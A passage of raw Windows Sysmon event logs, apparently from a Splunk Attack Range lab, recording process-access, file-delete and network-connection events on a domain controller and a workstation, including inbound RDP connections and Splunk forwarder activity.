09:21:52.338{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.307{5EBD8912-8CC0-6151-1600-00000000FD01}12963424C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.307{5EBD8912-8CC0-6151-1600-00000000FD01}12961336C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.292{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.276{5EBD8912-8D26-6151-8500-00000000FD01}27602120C:\Windows\system32\csrss.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.167{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.167{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D30-6151-9A00-00000000FD01}4072C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+37172|c:\windows\system32\rpcss.dll+3df8d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:53.290{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A865BB96E42C3A4F2867980472E890F,SHA256=D278C50EA5A9A312C29E52CFEF6528B94BFF7DF2BC6F334EA0AE69502D1E7075,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:53.308{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8B7857FBE1A7A5E3CB7E0CF1909CCCE0,SHA256=DCDB7639FF956CA773FD49D67913DC689312837402E783A148C6E2DABDC38997,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:50.036{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\explorer.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-429.attackrange.local54206-false20.199.120.85-443https 354300x8000000000000000980892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:51.031{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49683-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:54.400{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6844574560645A2FC56EB8341B99F18,SHA256=5B27E565A2CE4068E043ABBF9979C7C23898D95229791DE19993123E5FA628B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055927Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:54.355{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:54.355{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:54.355{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001055924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:54.355{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 354300x80000000000000001055923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.284{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49718-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001055922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:52.122{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54207-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:54.011{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=553D5B3BD1C1A78F0E7E10A3A8A53BC1,SHA256=D6F860E0BF712FCC1175EA1EF6E848D95786EED6455C762AE7B2D37B4B2C05D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:52.977{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-63759-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:55.525{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F9D002C7A709A91FA44723AB5ACB15B,SHA256=FA89A6D13836423D21A3B37C3114B82515FDE2B5DD6514035B3003614DBB9B7B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055929Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:53.044{5EBD8912-8CD0-6151-2A00-00000000FD01}2404C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54371- 23542300x80000000000000001055928Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:55.011{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=944D6D243664D412571C45337C7BD46F,SHA256=918D41FEF7020745FD0B2EE23C8D39A747F7FCCBC65CECB2EE3DA5AAA812C976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:55.072{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E1A414FBA7EB487A5C6C6FA2E5696CAA,SHA256=CD57ED0B861F9D85DDD5CE9F32599FB06D0ADCBDD2D117247BE360177D7FBAC9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:53.741{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59517-false10.0.1.12-8000- 23542300x8000000000000000980896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:56.587{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A62574AEEA5A1037DCBBD3AF26CCD2BC,SHA256=B987535A796AF11F5E008A5CAB99395DA9184D1FF473086AA25A8BB348DE3095,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055930Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:56.012{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F884350151A0524D702EF4997D8FCE16,SHA256=ED7D0AFBAF80609C4EB51FCADE732294B84D6B7C4B1AD360B10A7C14E235B056,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980898Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:57.822{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5109DE8D3C49D9A87C36295A3AEA3676,SHA256=B581271D0077AE523F22B47EE72FB4724EB9896473BE36E7ADDD055FCB4D4BB7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055937Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.528{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\tileobjserver.dll+bce2|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001055936Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.528{5EBD8912-8CD0-6151-2C00-00000000FD01}24243124C:\Windows\system32\svchost.exe{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+3810b|c:\windows\system32\tileobjserver.dll+bc8f|c:\windows\system32\tileobjserver.dll+26f12|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+1279|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+3b27c|C:\Windows\System32\combase.dll+3af32|C:\Windows\System32\combase.dll+39848|C:\Windows\System32\combase.dll+375ad|C:\Windows\System32\combase.dll+36c7f|C:\Windows\System32\combase.dll+524b9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x80000000000000001055935Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.512{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055934Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.512{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055933Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.512{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055932Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.512{5EBD8912-8CBF-6151-0C00-00000000FD01}8448C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2C00-00000000FD01}2424C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055931Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:57.027{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 